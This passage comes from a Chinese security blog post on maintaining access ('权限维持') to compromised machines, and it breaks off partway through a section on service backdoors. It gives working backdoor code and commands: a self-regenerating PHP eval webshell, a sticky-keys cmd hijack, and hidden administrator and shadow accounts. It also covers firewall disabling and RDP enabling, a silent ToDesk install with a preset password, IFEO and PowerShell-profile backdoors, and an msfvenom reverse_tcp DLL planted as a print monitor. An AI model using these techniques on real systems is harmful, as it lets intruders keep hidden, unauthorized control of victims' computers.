<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>权限维持 | 子夜旅馆</title>
  <meta name="keywords" content=" 权限维持 ">
  <meta name="description" content="权限维持 | 子夜旅馆">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="子夜旅馆">
<meta property="og:type" content="website">
<meta property="og:title" content="about">
<meta property="og:url" content="https://sunwu57.github.io/about/index.html">
<meta property="og:site_name" content="子夜旅馆">
<meta property="og:description" content="子夜旅馆">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-03-24T13:10:23.000Z">
<meta property="article:modified_time" content="2023-03-24T13:10:23.260Z">
<meta property="article:author" content="ziyebuku">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/bikabika.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 5.4.2"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/bikabika.jpg"/>
</a>
<div class="author">
    <span>ziyebuku</span>
</div>

<div class="icon">
    
        
    
        
            <a title="github"
               href="https://github.com/sunwu57"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:1210396142@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=1210396142&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
</div>



    <a class="more-menus">更多菜单</a>


<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(13)</small>
            
        </div>
    </li>
    
        
            
                <li>
                    <div data-rel="杂文">
                        
                        杂文
                        <small>(8)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="web">
                        
                        web
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="渗透">
                        
                        渗透
                        <small>(4)</small>
                        
                    </div>
                    
                </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
                <a class="dynamic-menu "
                   target="_self"
                   
                   href="http://sunwu.world/">子夜旅馆</a>
        
            
                <a class="dynamic-menu "
                   target="_blank"
                        
                   href="http://pan.sunwu.world/">子夜旅馆的网盘</a>
        
            
                <a class="dynamic-menu "
                   target="_blank"
                        
                   href="https://github.com/sunwu57">github</a>
        
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="13">
<input type="hidden" id="yelog_site_word_count" value="22.5k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://sunwu.world/">子夜旅馆</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>靶场</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>格言</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>护网</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>权限维持</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>bing</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>blog</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>chatGPT</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hexo</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hw</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>markdown</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>typora</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/04/10/%E6%8A%A4%E7%BD%91%E9%A2%98%E5%BA%93/"
           data-tag="护网,hw"
           data-author="" >
            <span class="post-title" title="2023年护网题库">2023年护网题库</span>
            <span class="post-date" title="2023-04-10 15:38:32">2023/04/10</span>
        </a>
        
        
        <a id="top" class="全部文章 渗透 "
           href="/2023/03/29/ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E4%BA%94/"
           data-tag="靶场"
           data-author="" >
            <span class="post-title" title="ATT&amp;CK红队评估实战靶场五">ATT&amp;CK红队评估实战靶场五</span>
            <span class="post-date" title="2023-03-29 20:24:27">2023/03/29</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/03/28/%E6%A0%BC%E8%A8%80/"
           data-tag="格言"
           data-author="" >
            <span class="post-title" title="格言">格言</span>
            <span class="post-date" title="2023-03-28 10:17:45">2023/03/28</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/03/26/%E5%88%A9%E7%94%A8github%E6%90%AD%E5%BB%BAhexo%E5%8D%9A%E5%AE%A2/"
           data-tag="hexo"
           data-author="" >
            <span class="post-title" title="利用github搭建hexo博客~">利用github搭建hexo博客~</span>
            <span class="post-date" title="2023-03-26 23:58:54">2023/03/26</span>
        </a>
        
        
        <a id="top" class="全部文章 杂文 "
           href="/2023/03/25/markdown%E8%AF%AD%E6%B3%95/"
           data-tag="markdown,typora"
           data-author="" >
            <span class="post-title" title="markdown语法">markdown语法</span>
            <span class="post-date" title="2023-03-25 10:50:49">2023/03/25</span>
        </a>
        
        
        <a  class="全部文章 渗透 "
           href="/2023/03/30/ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E4%BA%8C/"
           data-tag="靶场"
           data-author="" >
            <span class="post-title" title="ATT&amp;CK红队评估实战靶场二">ATT&amp;CK红队评估实战靶场二</span>
            <span class="post-date" title="2023-03-30 14:36:43">2023/03/30</span>
        </a>
        
        
        <a  class="全部文章 渗透 "
           href="/2023/03/30/ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98%E9%9D%B6%E5%9C%BA%E4%B8%80/"
           data-tag="靶场"
           data-author="" >
            <span class="post-title" title="ATT&amp;CK红队评估实战靶场一">ATT&amp;CK红队评估实战靶场一</span>
            <span class="post-date" title="2023-03-30 14:34:52">2023/03/30</span>
        </a>
        
        
        <a  class="全部文章 杂文 "
           href="/2023/03/29/markdown%E4%BB%A3%E7%A0%81%E6%AE%B5%E6%8A%98%E5%8F%A0%E8%AF%AD%E6%B3%95/"
           data-tag="markdown"
           data-author="" >
            <span class="post-title" title="markdown代码段折叠语法">markdown代码段折叠语法</span>
            <span class="post-date" title="2023-03-29 18:34:09">2023/03/29</span>
        </a>
        
        
        <a  class="全部文章 渗透 "
           href="/2023/03/29/vulnhub-FOWSNIFF%E9%9D%B6%E6%9C%BA/"
           data-tag="靶场"
           data-author="" >
            <span class="post-title" title="vulnhub-FOWSNIFF靶机">vulnhub-FOWSNIFF靶机</span>
            <span class="post-date" title="2023-03-29 18:14:04">2023/03/29</span>
        </a>
        
        
        <a  class="全部文章 杂文 "
           href="/2023/03/27/%E4%BD%BF%E7%94%A8chatGPT%E5%86%99%E8%AE%BA%E6%96%87%E6%96%B9%E6%B3%95/"
           data-tag="chatGPT"
           data-author="" >
            <span class="post-title" title="使用chatGPT写论文的方法">使用chatGPT写论文的方法</span>
            <span class="post-date" title="2023-03-27 15:44:22">2023/03/27</span>
        </a>
        
        
        <a  class="全部文章 杂文 "
           href="/2023/03/27/%E7%99%BE%E5%88%86%E7%99%BE%E8%BF%9B%E8%A1%8Cnew-bing%E8%81%8A%E5%A4%A9%EF%BC%8C%E8%B7%B3%E8%BF%87%E5%80%99%E8%A1%A5%E5%90%8D%E5%8D%95/"
           data-tag="bing"
           data-author="" >
            <span class="post-title" title="百分百进行new bing聊天，跳过候补名单">百分百进行new bing聊天，跳过候补名单</span>
            <span class="post-date" title="2023-03-27 15:16:00">2023/03/27</span>
        </a>
        
        
        <a  class="全部文章 web "
           href="/2023/03/25/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/"
           data-tag="权限维持"
           data-author="" >
            <span class="post-title" title="权限维持">权限维持</span>
            <span class="post-date" title="2023-03-25 16:39:15">2023/03/25</span>
        </a>
        
        
        <a  class="全部文章 杂文 "
           href="/2023/03/23/typora+PicGo+LskyPro+Obsidian%E5%AE%9E%E7%8E%B0%E6%96%87%E7%AB%A0%E7%AE%A1%E7%90%86/"
           data-tag="blog"
           data-author="" >
            <span class="post-title" title="typora+PicGo+LskyPro+Obsidian实现文章管理">typora+PicGo+LskyPro+Obsidian实现文章管理</span>
            <span class="post-date" title="2023-03-23 22:37:16">2023/03/23</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-权限维持" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">权限维持</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="web">web</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color5">权限维持</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2023-03-25 17:30:54'>2023-03-25 16:39</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:4.9k</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-text">权限维持</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#windows"><span class="toc-text">windows</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E4%B8%8D%E6%AD%BB%E9%A9%AC"><span class="toc-text">php不死马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%B2%98%E6%BB%9E%E9%94%AE%E5%90%8E%E9%97%A8"><span class="toc-text">粘滞键后门</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E9%9A%90%E8%97%8F"><span class="toc-text">文件隐藏</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%BF%9D%E6%8A%A4"><span class="toc-text">文件保护</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#todesk"><span class="toc-text">todesk</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7%E5%BC%803389"><span class="toc-text">添加用户开3389</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%98%A0%E5%83%8F%E5%8A%AB%E6%8C%81%E6%8A%80%E6%9C%AF"><span class="toc-text">映像劫持技术</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AD%96%E7%95%A5%E7%BB%84%E8%84%9A%E6%9C%AC%E7%BB%B4%E6%8C%81-%E7%AC%AC%E4%B8%80%E6%AC%A1%E5%8F%AF%E8%83%BD%E4%BC%9A%E8%93%9D%E5%B1%8F"><span class="toc-text">策略组脚本维持(第一次可能会蓝屏)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BD%B1%E5%AD%90%E8%B4%A6%E6%88%B7"><span class="toc-text">影子账户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Powershell%E5%90%8E%E9%97%A8"><span class="toc-text">Powershell后门</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%93%E5%8D%B0%E6%9C%BA-Monitors-%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-text">打印机(Monitors)权限维持</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E5%AE%89%E5%85%A8%E6%8F%8F%E8%BF%B0%E7%AC%A6%E9%9A%90%E8%97%8F%E6%9C%8D%E5%8A%A1%E5%90%8E%E9%97%A8%E8%BF%9B%E8%A1%8C%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-text">利用安全描述符隐藏服务后门进行权限维持</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#lls%E5%90%8E%E9%97%A8"><span class="toc-text">lls后门</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#linux"><span class="toc-text">linux</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#crontab%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%BC%B9shell"><span class="toc-text">crontab计划任务弹shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#vim-python3%E6%89%A9%E5%B1%95%E5%90%8E%E9%97%A8"><span class="toc-text">vim python3扩展后门</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#inetd%E6%9C%8D%E5%8A%A1%E5%90%8E%E9%97%A8"><span class="toc-text">inetd服务后门</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Rootkit"><span class="toc-text">Rootkit</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Diamorphine"><span class="toc-text">Diamorphine</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8D%8F%E8%AE%AE%E5%90%8E%E9%97%A8"><span class="toc-text">协议后门</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ICMP"><span class="toc-text">ICMP</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#DNS"><span class="toc-text">DNS</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PAM%E5%90%8E%E9%97%A8"><span class="toc-text">PAM后门</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%B1%9E%E6%80%A7%E4%BF%AE%E6%94%B9"><span class="toc-text">文件属性修改</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E6%97%B6%E9%97%B4%E4%BF%AE%E6%94%B9"><span class="toc-text">文件时间修改</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E9%94%81%E5%AE%9A"><span class="toc-text">文件锁定</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%86%E5%8F%B2%E5%91%BD%E4%BB%A4%E6%93%8D%E4%BD%9C"><span class="toc-text">历史命令操作</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%AA%E9%92%88%E5%AF%B9%E4%BD%A0%E7%9A%84%E5%B7%A5%E4%BD%9C%E5%85%B3%E9%97%AD%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95"><span class="toc-text">只针对你的工作关闭历史记录</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%8E%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95%E4%B8%AD%E5%88%A0%E9%99%A4%E6%8C%87%E5%AE%9A%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="toc-text">从历史记录中删除指定的命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#passwd%E5%A2%9E%E5%8A%A0%E7%94%A8%E6%88%B7"><span class="toc-text">passwd增加用户</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#suid%E5%90%8E%E9%97%A8"><span class="toc-text">suid后门</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SSH%E5%90%8E%E9%97%A8"><span class="toc-text">SSH后门</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#ssh%E8%BD%AF%E8%BF%9E%E6%8E%A5%E5%90%8E%E9%97%A8"><span class="toc-text">ssh软连接后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SSH%E5%85%AC%E9%92%A5%E5%85%8D%E5%AF%86%E7%99%BB%E5%BD%95"><span class="toc-text">SSH公钥免密登录</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#SSH-Keylogger%E8%AE%B0%E5%BD%95%E5%AF%86%E7%A0%81"><span class="toc-text">SSH Keylogger记录密码</span></a></li></ol></li></ol></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h1><h2 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h2><h3 id="php不死马"><a href="#php不死马" class="headerlink" title="php不死马"></a>php不死马</h3><pre><code class="php">&lt;?php
ignore_user_abort(); //关掉浏览器，PHP脚本也可以继续执行.
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval = 5; // 每隔*秒运行
do &#123;
$filename = &#39;test.php&#39;;
if(file_exists($filename)) &#123;
echo &quot;xxx&quot;;
&#125;
else &#123;
$file = fopen(&quot;test.php&quot;, &quot;w&quot;);
$txt = &quot;&lt;?php @eval($_POST[cmd]); ?&gt;\n&quot;;   //木马密码cmd
fwrite($file, $txt);
fclose($file);
eval(system(&quot;Attrib +s +a +h +r test.php&quot;)); //隐藏文件
&#125;
sleep($interval);
&#125; while (true);
?&gt;
</code></pre>
<h3 id="粘滞键后门"><a href="#粘滞键后门" class="headerlink" title="粘滞键后门"></a>粘滞键后门</h3><pre><code>move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak
Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe
</code></pre>
<ol>
<li>将sethc.exe的拥有者改为administrator</li>
<li>运行上面的话即可</li>
<li>五次shift即可cmd</li>
</ol>
<h3 id="文件隐藏"><a href="#文件隐藏" class="headerlink" title="文件隐藏"></a>文件隐藏</h3><p><code>Attrib +s +a +h +r 1.php</code> 隐藏文件或者目录</p>
<h3 id="文件保护"><a href="#文件保护" class="headerlink" title="文件保护"></a>文件保护</h3><p><a target="_blank" rel="noopener" href="http://www.xoslab.com/efl.html">http://www.xoslab.com/efl.html</a>   //windows文件保护<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251730702.png" alt="image.png"></p>
<ol>
<li>一般只留第一个</li>
<li>sc qc/stop/delete xlkfs    //检查/停止/删除这个文件保护的服务  <h3 id="todesk"><a href="#todesk" class="headerlink" title="todesk"></a>todesk</h3>官方文档<a target="_blank" rel="noopener" href="https://www.todesk.com/helpcenter/solo-65.html">https://www.todesk.com/helpcenter/solo-65.html</a></li>
<li>ToDesk_4.3.2.1.exe /S                    todesk静默安装</li>
<li>将下面脚本保存为2.bat<pre><code class="bat">@echo off
for /f &quot;delims=&quot; %%i in (&#39;&quot;C:\Program Files (x86)\ToDesk\ToDesk.exe&quot; -setpasswd 123456&#39;) do echo %%i
for /f &quot;delims=&quot; %%i in (&#39;&quot;C:\Program Files (x86)\ToDesk\ToDesk.exe&quot; -status&#39;) do echo %%i
for /f &quot;delims=&quot; %%i in (&#39;&quot;C:\Program Files (x86)\ToDesk\ToDesk.exe&quot; -autostart on&#39;) do echo %%i
Pause
</code></pre>
</li>
<li>设置密钥123456，开机自启<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251728749.png" alt="image.png"></li>
<li>如果目标机器已安装todesk<ol>
<li>这种意外情况对于我们来说就挺，应该是那种想到了开心的事的感觉。其实在这里要说的是另一种方法获取识别码以及连接密码，我们只需要找到todesk的根目录即可，然后查看config.ini，在cinfig.ini可以找到识别码以及加密的密码。</li>
</ol>
</li>
</ol>
<h3 id="添加用户开3389"><a href="#添加用户开3389" class="headerlink" title="添加用户开3389"></a>添加用户开3389</h3><pre><code>net user qianxin QanXin.Nb123 /add
net localgroup administrators qianxin /add
netsh firewall set opmode disable
netsh advfirewall show allprofiles
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -anop tcp | find &quot;3389&quot;
</code></pre>
<h3 id="映像劫持技术"><a href="#映像劫持技术" class="headerlink" title="映像劫持技术"></a>映像劫持技术</h3><ol>
<li>打开注册表计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\    </li>
<li>新建一个项ziye.exe ，右侧新增一个字符串，名字是Debugger    <pre><code>![image-20221110140524525](https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251728138.png)
</code></pre>
</li>
<li>值为要执行的程序<code>C:\Windows\System32\cmd.exe</code>(必须是这个这个斜杠)</li>
<li>这个效果就是只要执行任意一个叫做ziye.exe的程序(常用sethc.exe粘滞键)，就会运行cmd.exe</li>
<li>一般可以是cmd，木马等</li>
</ol>
<h3 id="策略组脚本维持-第一次可能会蓝屏"><a href="#策略组脚本维持-第一次可能会蓝屏" class="headerlink" title="策略组脚本维持(第一次可能会蓝屏)"></a>策略组脚本维持(第一次可能会蓝屏)</h3><p><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251728173.png" alt="image-20221110142513383"></p>
<ol>
<li>输入gpedit.msc 打开组策略，打开 windows设置 脚本 里面又关机和开机</li>
<li>在C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup放入开机需要自启动的文件</li>
</ol>
<h3 id="影子账户"><a href="#影子账户" class="headerlink" title="影子账户"></a>影子账户</h3><p>通常在拿到服务器后会创建一个带$符号的账户，因为在常规cmd下是无法查看到的。</p>
<ol>
<li>建立新的用户<pre><code>net user qianxin$ QanXin.Nb123 /add &amp; net localgroup administrators qianxin$ /add    
</code></pre>
</li>
<li> 注册表打开HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User<br>到SAM没有子目录，说明没有权限，赋权，重新打开注册表即可<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251728646.png" alt="image-20221110155715652"></li>
<li>将1F4下F项的值复制到3E8下F项里面，替换原有数据<br>双击F项，右键全选，右键复制，同流程覆盖</li>
<li> 把3E8和qianxin$导出来<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251729712.png" alt="image-20221110160323063"></li>
<li>  net user qianxin$ /del</li>
<li> 双击导出来的两个注册表进行导入</li>
<li> <code>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f</code>开3389</li>
<li> RDP连接成功</li>
</ol>
<h3 id="Powershell后门"><a href="#Powershell后门" class="headerlink" title="Powershell后门"></a>Powershell后门</h3><p>Powershell配置文件其实就是一个powershell脚本，他可以在每次运行powershell的时候自动运行，所以可以通过向该文件写入自定义的语句用来长期维持权限</p>
<ol>
<li><pre><code>查看当前是否存在配置文件
</code></pre>
<pre><code>echo $profile
Test-path $profile
</code></pre>
</li>
<li>如果返回false则需要创建一个<br><code>New-Item -Path $profile -Type File –Force</code></li>
<li>然后写入命令，这里我以创建一个用户为目标，也可以写成反弹shell的<pre><code class="bat">net user qianxin$ QanXin.Nb123 /add &amp; net localgroup administrators qianxin$ /add
</code></pre>
</li>
<li>这里的C:\1.bat是我的后门文件位置<pre><code class="powershell">$string = &#39;Start-Process &quot;C:\1.bat&quot;&#39;
$string | Out-File -FilePath $profile -Append
more $profile
</code></pre>
</li>
<li>重新打开powershell就会自动执行,创建账户</li>
<li>如果失败则，以管理员权限打开powershell运行set-ExecutionPolicy RemoteSigned并摁回车即可</li>
</ol>
<h3 id="打印机-Monitors-权限维持"><a href="#打印机-Monitors-权限维持" class="headerlink" title="打印机(Monitors)权限维持"></a>打印机(Monitors)权限维持</h3><p>项目地址 <a target="_blank" rel="noopener" href="https://github.com/Al1ex/Monitor">https://github.com/Al1ex/Monitor</a></p>
<ol>
<li>项目下载下来，自己编译也可以，也可以用现成的<pre><code class="C++">#include &quot;Windows.h&quot;
int main() &#123;
MONITOR_INFO_2 monitorInfo;
TCHAR env[12] = TEXT(&quot;Windows x64&quot;);
TCHAR name[12] = TEXT(&quot;Monitor&quot;);
TCHAR dll[12] = TEXT(&quot;test.dll&quot;);
monitorInfo.pName = name;
monitorInfo.pEnvironment = env;
monitorInfo.pDLLName = dll;
AddMonitor(NULL, 2, (LPBYTE)&amp;monitorInfo);
return 0;
&#125;
</code></pre>
pName //监视器名称<br>pEnvironment //环境架构<br>pDLLName //监视器DLL文件的名称</li>
<li>msf生成dll<br><code>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f dll &gt; shell.dll</code></li>
<li>将shell.dll复制到目标主机的system32目录下，之后重命名为test.dll(也就是上面的<br>PDLLName，你也可以自己修改为自己喜欢的，总之随意)<br><code>copy C:\temp\shell.dll C:\Windows\System32\test.dll</code></li>
<li>将Monitors.exe也移动到C:\Windows\System32，这是执行Monitors.exe即可反弹shell</li>
<li><code>reg add &quot;hklm\system\currentcontrolset\control\print\monitors\Pentestlab&quot; /v &quot;Driver&quot; /d &quot;test.dll&quot; /t REG_SZ</code>    //塞到开机启动项里 </li>
<li>打开注册表查看<code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>是否写入成功<br><img src="https://raw.githubusercontent.com/sunwu57/tuchuang/main/img/202303251729113.png" alt="image-20221110170643019"></li>
<li>msf监听，受害机重启即可收到监听</li>
</ol>
<h3 id="利用安全描述符隐藏服务后门进行权限维持"><a href="#利用安全描述符隐藏服务后门进行权限维持" class="headerlink" title="利用安全描述符隐藏服务后门进行权限维持"></a>利用安全描述符隐藏服务后门进行权限维持</h3><p>将后门程序注册为自启动服务是我们常用的一种进行权限维持的方法，通常可以通过sc或者powershell来进行创建。本文创建服务名为.NET CLR Networking 3.5.0.0的服务(什么名字都可以)</p>
<ol>
<li><pre><code class="cmd">cmd创建自启动服务
